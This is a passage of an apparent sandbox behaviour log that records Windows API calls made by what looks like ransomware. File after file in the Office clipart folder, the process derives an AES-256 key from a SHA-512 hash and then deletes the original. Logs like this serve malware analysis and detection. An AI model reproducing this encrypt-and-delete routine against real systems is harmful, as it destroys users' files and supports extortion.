Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 1 [0199.293] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00902_.wmf")) returned 1 [0199.294] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0199.294] wcslen (_String="OK") returned 0x2 [0199.294] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.294] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.294] CryptDestroyKey (hKey=0x9ad438) returned 1 [0199.294] CryptDestroyHash (hHash=0x9ad138) returned 1 [0199.294] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0199.297] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0199.297] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.297] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad2b8) returned 1 [0199.297] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.297] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.297] wcslen (_String="\\\\?\\") returned 0x4 [0199.337] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 1 [0199.337] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\explr_01.mid")) returned 1 [0199.338] CryptDestroyKey (hKey=0x9ad838) returned 1 [0199.338] wcslen (_String="OK") returned 0x2 [0199.338] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.338] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.338] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0199.338] CryptDestroyHash (hHash=0x9ad338) returned 1 [0199.339] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0199.341] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0199.341] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.341] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad138) returned 1 [0199.341] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.341] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.341] wcslen (_String="\\\\?\\") returned 0x4 [0199.387] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID") returned 1 [0199.387] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FALL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fall_01.mid")) returned 1 [0199.388] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0199.388] wcslen (_String="OK") returned 0x2 [0199.388] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.389] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.389] CryptDestroyKey (hKey=0x9ad138) returned 1 [0199.389] CryptDestroyHash (hHash=0x9ad578) returned 1 [0199.389] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0199.391] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447ac | out: phHash=0x1d4447ac) returned 1 [0199.391] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.391] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4447b0 | out: phKey=0x1d4447b0*=0x9ad2f8) returned 1 [0199.391] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.391] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.391] wcslen (_String="\\\\?\\") returned 0x4 [0199.451] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 1 [0199.451] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00074_.wmf")) returned 1 [0199.452] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0199.452] wcslen (_String="OK") returned 0x2 [0199.452] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.452] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.452] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0199.452] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0199.452] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0199.455] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0199.455] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.455] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad638) returned 1 [0199.455] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.455] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.455] wcslen (_String="\\\\?\\") returned 0x4 [0199.474] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 1 [0199.474] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00076_.wmf")) returned 1 [0199.475] CryptDestroyKey (hKey=0x9ad478) returned 1 [0199.475] wcslen (_String="OK") returned 0x2 [0199.475] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.475] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.475] CryptDestroyKey (hKey=0x9ad638) returned 1 [0199.475] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0199.475] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0199.478] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0199.478] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.478] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad438) returned 1 [0199.478] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.478] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.478] wcslen (_String="\\\\?\\") returned 0x4 [0199.484] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 1 [0199.484] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00077_.wmf")) returned 1 [0199.488] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0199.488] wcslen (_String="OK") returned 0x2 [0199.488] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.488] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.488] CryptDestroyKey (hKey=0x9ad438) returned 1 [0199.488] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0199.488] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0199.491] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0199.491] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.491] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad338) returned 1 [0199.491] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.491] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.491] wcslen (_String="\\\\?\\") returned 0x4 [0199.496] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 1 [0199.496] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf")) returned 1 [0199.498] CryptDestroyKey (hKey=0x9ad478) returned 1 [0199.498] wcslen (_String="OK") returned 0x2 [0199.498] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.498] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.498] CryptDestroyKey (hKey=0x9ad338) returned 1 [0199.498] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0199.498] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0199.500] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0199.500] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.500] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad378) returned 1 [0199.500] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.500] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.500] wcslen (_String="\\\\?\\") returned 0x4 [0199.532] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 1 [0199.532] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf")) returned 1 [0199.533] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0199.533] wcslen (_String="OK") returned 0x2 [0199.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.534] CryptDestroyKey (hKey=0x9ad378) returned 1 [0199.534] CryptDestroyHash (hHash=0x9ad278) returned 1 [0199.534] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0199.535] CryptCreateHash (in: hProv=0x8e3990, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0199.535] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.535] CryptDeriveKey (in: hProv=0x8e3990, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad178) returned 1 [0199.535] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.535] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.535] wcslen (_String="\\\\?\\") returned 0x4 [0199.540] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 1 [0199.540] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00096_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00096_.wmf")) returned 1 [0199.541] CryptDestroyKey (hKey=0x9ad638) returned 1 [0199.541] wcslen (_String="OK") returned 0x2 [0199.541] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.541] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.541] CryptDestroyKey (hKey=0x9ad178) returned 1 [0199.541] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0199.541] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0199.543] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0199.543] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.543] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad378) returned 1 [0199.543] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.543] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.543] wcslen (_String="\\\\?\\") returned 0x4 [0199.567] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 1 [0199.567] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00296_.wmf")) returned 1 [0199.568] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0199.568] wcslen (_String="OK") returned 0x2 [0199.568] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.568] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.568] CryptDestroyKey (hKey=0x9ad378) returned 1 [0199.568] CryptDestroyHash (hHash=0x9ad138) returned 1 [0199.568] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0199.570] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0199.570] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.570] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad438) returned 1 [0199.570] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.570] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.570] wcslen (_String="\\\\?\\") returned 0x4 [0199.618] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 1 [0199.618] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00297_.wmf")) returned 1 [0199.619] CryptDestroyKey (hKey=0x9ad738) returned 1 [0199.619] wcslen (_String="OK") returned 0x2 [0199.619] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.619] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.620] CryptDestroyKey (hKey=0x9ad438) returned 1 [0199.620] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0199.620] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0199.622] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0199.622] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.622] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad478) returned 1 [0199.622] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.622] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.622] wcslen (_String="\\\\?\\") returned 0x4 [0199.655] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 1 [0199.655] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00306_.wmf")) returned 1 [0199.657] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0199.657] wcslen (_String="OK") returned 0x2 [0199.657] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.657] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.657] CryptDestroyKey (hKey=0x9ad478) returned 1 [0199.657] CryptDestroyHash (hHash=0x9ad438) returned 1 [0199.657] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0199.660] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44486c | out: phHash=0x1d44486c) returned 1 [0199.660] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.660] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444870 | out: phKey=0x1d444870*=0x9ad2b8) returned 1 [0199.660] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.660] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.660] wcslen (_String="\\\\?\\") returned 0x4 [0199.702] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF") returned 1 [0199.702] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00336_.wmf")) returned 1 [0199.729] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0199.729] wcslen (_String="OK") returned 0x2 [0199.729] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.729] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.729] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0199.729] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0199.729] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0199.731] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0199.731] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.731] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad438) returned 1 [0199.731] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.731] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.731] wcslen (_String="\\\\?\\") returned 0x4 [0199.834] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF") returned 1 [0199.834] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00361_.wmf")) returned 1 [0199.835] CryptDestroyKey (hKey=0x9ad678) returned 1 [0199.835] wcslen (_String="OK") returned 0x2 [0199.835] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.835] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.835] CryptDestroyKey (hKey=0x9ad438) returned 1 [0199.835] CryptDestroyHash (hHash=0x9ad838) returned 1 [0199.835] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0199.837] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0199.837] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.837] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad5f8) returned 1 [0199.837] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.837] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.837] wcslen (_String="\\\\?\\") returned 0x4 [0199.850] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 1 [0199.850] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf")) returned 1 [0199.851] CryptDestroyKey (hKey=0x9ad738) returned 1 [0199.851] wcslen (_String="OK") returned 0x2 [0199.851] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.851] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.851] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0199.851] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0199.851] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0199.853] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0199.853] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.853] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad838) returned 1 [0199.853] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.853] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.853] wcslen (_String="\\\\?\\") returned 0x4 [0199.931] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 1 [0199.931] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf")) returned 1 [0199.932] CryptDestroyKey (hKey=0x9ad538) returned 1 [0199.932] wcslen (_String="OK") returned 0x2 [0199.932] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.932] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.932] CryptDestroyKey (hKey=0x9ad838) returned 1 [0199.933] CryptDestroyHash (hHash=0x9ad878) returned 1 [0199.933] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0199.935] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0199.935] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.935] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad2b8) returned 1 [0199.935] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.935] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.935] wcslen (_String="\\\\?\\") returned 0x4 [0199.989] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 1 [0199.989] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf")) returned 1 [0199.990] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0199.990] wcslen (_String="OK") returned 0x2 [0199.990] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.990] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.990] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0199.990] CryptDestroyHash (hHash=0x9ad738) returned 1 [0199.990] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0199.995] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0199.996] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.996] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad478) returned 1 [0199.996] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.996] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.996] wcslen (_String="\\\\?\\") returned 0x4 [0200.004] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 1 [0200.005] DeleteFileW 